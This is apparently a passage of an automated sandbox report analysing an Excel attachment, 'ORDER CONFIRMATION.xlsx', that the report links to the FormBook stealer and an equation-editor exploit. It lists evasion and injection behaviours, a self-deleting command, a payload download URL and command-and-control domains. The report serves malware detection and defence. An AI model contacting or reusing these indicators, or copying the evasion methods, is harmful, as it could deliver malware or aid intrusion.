      Source: initial sampleStatic PE information: section name: .text entropy: 7.19334150193

      Persistence and Installation Behavior:

      barindex
      Uses ipconfig to lookup or modify the Windows network settingsShow sources
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

      Boot Survival:

      barindex
      Drops PE files to the user root directoryShow sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion:

      barindex
      Yara detected AntiVM3Show sources
      Source: Yara matchFile source: 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2976, type: MEMORYSTR
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
      Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 00000000000C85E4 second address: 00000000000C85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 00000000000C897E second address: 00000000000C8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1868Thread sleep time: -180000s >= -30000sJump to behavior
      Source: C:\Users\Public\vbc.exe TID: 1828Thread sleep time: -38487s >= -30000sJump to behavior
      Source: C:\Users\Public\vbc.exe TID: 1016Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
      Source: C:\Users\Public\vbc.exeCode function: 8_2_004088B0 rdtsc 8_2_004088B0
      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 38487Jump to behavior
      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: explorer.exe, 00000009.00000000.483010699.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000009.00000000.487770072.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
      Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmpBinary or memory string: vmware
      Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
      Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
      Source: explorer.exe, 00000009.00000000.487770072.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
      Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmpBinary or memory string: VMWARE
      Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
      Source: explorer.exe, 00000009.00000000.499415292.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
      Source: explorer.exe, 00000009.00000000.523219714.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
      Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
      Source: explorer.exe, 00000009.00000000.505298411.00000000083A6000.00000004.00000001.sdmpBinary or memory string: .SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
      Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
      Source: C:\Users\Public\vbc.exeCode function: 8_2_004088B0 rdtsc 8_2_004088B0
      Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\ipconfig.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A826F8 mov eax, dword ptr fs:[00000030h]8_2_00A826F8
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F526F8 mov eax, dword ptr fs:[00000030h]11_2_01F526F8
      Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00409B20 LdrLoadDll,8_2_00409B20
      Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeDomain query: www.americanstonesusa.com
      Source: C:\Windows\explorer.exeNetwork Connect: 34.98.99.30 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.realstyleworks.com
      Source: C:\Windows\explorer.exeDomain query: www.plasticplank.com
      Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 192.99.131.252 80Jump to behavior
      Sample uses process hollowing techniqueShow sources
      Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 2F0000Jump to behavior
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Injects a PE file into a foreign processesShow sources
      Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Users\Public\vbc.exeThread register set: target process: 1764Jump to behavior
      Source: C:\Users\Public\vbc.exeThread register set: target process: 1764Jump to behavior
      Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 1764Jump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exeJump to behavior
      Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
      Source: explorer.exe, 00000009.00000000.499712873.0000000000750000.00000002.00020000.sdmp, ipconfig.exe, 0000000B.00000002.687764984.0000000000840000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000009.00000000.483010699.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
      Source: explorer.exe, 00000009.00000000.499712873.0000000000750000.00000002.00020000.sdmp, ipconfig.exe, 0000000B.00000002.687764984.0000000000840000.00000002.00020000.sdmpBinary or memory string: !Progman
      Source: explorer.exe, 00000009.00000000.499712873.0000000000750000.00000002.00020000.sdmp, ipconfig.exe, 0000000B.00000002.687764984.0000000000840000.00000002.00020000.sdmpBinary or memory string: Program Manager<
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
      Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading111OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information11LSA SecretsSystem Network Configuration Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncSystem Information Discovery113Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobTimestomp1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Extra Window Memory Injection1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 483668 Sample: ORDER CONFIRMATION.xlsx Startdate: 15/09/2021 Architecture: WINDOWS Score: 100 39 www.thaysay.net 2->39 41 www.thaibinhgear.com 2->41 43 20 other IPs or domains 2->43 61 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->61 63 Found malware configuration 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 16 other signatures 2->67 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 34 36 2->15         started        signatures3 process4 dnsIp5 45 198.23.212.143, 49167, 80 AS-COLOCROSSINGUS United States 10->45 33 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 10->33 dropped 35 C:\Users\Public\vbc.exe, PE32 10->35 dropped 85 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->85 17 vbc.exe 10->17         started        37 C:\Users\user\...\~$ORDER CONFIRMATION.xlsx, data 15->37 dropped file6 signatures7 process8 signatures9 53 Machine Learning detection for dropped file 17->53 55 Uses ipconfig to lookup or modify the Windows network settings 17->55 57 Tries to detect virtualization through RDTSC time measurements 17->57 59 Injects a PE file into a foreign processes 17->59 20 vbc.exe 17->20         started        23 vbc.exe 17->23         started        process10 signatures11 69 Modifies the context of a thread in another process (thread injection) 20->69 71 Maps a DLL or memory area into another process 20->71 73 Sample uses process hollowing technique 20->73 75 Queues an APC in another process (thread injection) 20->75 25 ipconfig.exe 20->25         started        28 explorer.exe 20->28 injected process12 dnsIp13 77 Modifies the context of a thread in another process (thread injection) 25->77 79 Maps a DLL or memory area into another process 25->79 81 Tries to detect virtualization through RDTSC time measurements 25->81 31 cmd.exe 25->31         started        47 americanstonesusa.com 192.99.131.252, 49168, 49183, 49198 OVHFR Canada 28->47 49 www.realstyleworks.com 28->49 51 5 other IPs or domains 28->51 83 System process connects to network (likely due to code injection or exploit) 28->83 signatures14 process15

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      ORDER CONFIRMATION.xlsx33%VirustotalBrowse
      ORDER CONFIRMATION.xlsx29%ReversingLabsDocument-Word.Exploit.CVE-2017-11882

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\Public\vbc.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      8.2.vbc.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
      http://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ==0%Avira URL Cloudsafe
      http://www.authorjameswshepherdonline.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=enVshZ5ucPnpEJ79XKthUFU7GSCP6zpooNwVCr/P0s5BKPQIOoeKppWI2ezsgMpUEHhlAA==0%Avira URL Cloudsafe
      http://www.iis.fhg.de/audioPA0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://treyresearch.net0%URL Reputationsafe
      http://java.sun.com0%Avira URL Cloudsafe
      http://www.realstyleworks.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ==0%Avira URL Cloudsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://www.plasticplank.com/nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P100%Avira URL Cloudmalware
      http://www.hanlansmojitovillage.net/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=54OfAHeKGwMzfFPkI96ZbDhctG36f6+/FiUzkHshmPfrtcl9VWH+3olASXX+4wyWJIckJQ==0%Avira URL Cloudsafe
      www.hanlansmojitovillage.net/nthe/0%Avira URL Cloudsafe
      http://www.onpar-golf.com/nthe/?5jo4nr=B6rYep0Vm3M2EhGqYu/feA67U2SQJtGoCN7KN6fFlDVSMwI26b57yYW0nsnzi8vT4Ky8RQ==&t48tJ=fJEp_HN8mPiTHN5P0%Avira URL Cloudsafe
      http://computername/printers/printername/.printer0%Avira URL Cloudsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://198.23.212.143/ddr/vbc.exe100%Avira URL Cloudmalware
      http://servername/isapibackend.dll0%Avira URL Cloudsafe
      https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&amp;5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot0%Avira URL Cloudsafe
      http://www.thaysay.net/nthe/?5jo4nr=JnpX3/YBBy9TCXbKhp8uYEFRBGzb3gJR2p4kRdES4yzOlzRdyh/c8y0xiKK/8z4KJyQSLA==&t48tJ=fJEp_HN8mPiTHN5P0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      plasticplank.com
      		34.102.136.180
      		truefalse
        		unknown
        thaibinhgear.com
        		45.252.248.16
        		truetrue
          		unknown
          hanlansmojitovillage.net
          		34.102.136.180
          		truefalse
            		unknown
            americanstonesusa.com
            		192.99.131.252
            		truetrue
              		unknown
              www.aedenpure.com
              		217.160.0.177
              		truefalse
                		unknown
                thaysay.net
                		34.102.136.180
                		truefalse
                  		unknown
                  requotation.com
                  		184.168.131.241
                  		truetrue
                    		unknown
                    realstyleworks.com
                    		34.98.99.30
                    		truefalse
                      		unknown
                      www.tomrings.com
                      		162.0.214.58
                      		truefalse
                        		unknown
                        cname.landingi.com
                        		52.212.68.12
                        		truefalse
                          		high
                          goldmig.com
                          		203.16.60.34
                          		truetrue
                            		unknown
                            authorjameswshepherdonline.com
                            		34.102.136.180
                            		truefalse
                              		unknown
                              oakridge-pm.com
                              		184.168.131.241
                              		truetrue
                                		unknown
                                onpar-golf.com
                                		34.102.136.180
                                		truefalse
                                  		unknown
                                  www.americanstonesusa.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.thaysay.net
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.asoboawa.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.realstyleworks.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.mysahuarita.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.oakridge-pm.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.renatradingbv.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.thaibinhgear.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.plasticplank.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.authorjameswshepherdonline.com
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.goldmig.com
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.onpar-golf.com
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.hanlansmojitovillage.net
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown
                                                            www.requotation.com
                                                            		unknown
                                                            		unknowntrue
                                                              		unknown

                                                              Contacted URLs

                                                              NameMaliciousAntivirus DetectionReputation
                                                              http://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ==true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.authorjameswshepherdonline.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=enVshZ5ucPnpEJ79XKthUFU7GSCP6zpooNwVCr/P0s5BKPQIOoeKppWI2ezsgMpUEHhlAA==false
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.realstyleworks.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ==false
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.plasticplank.com/nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5Pfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
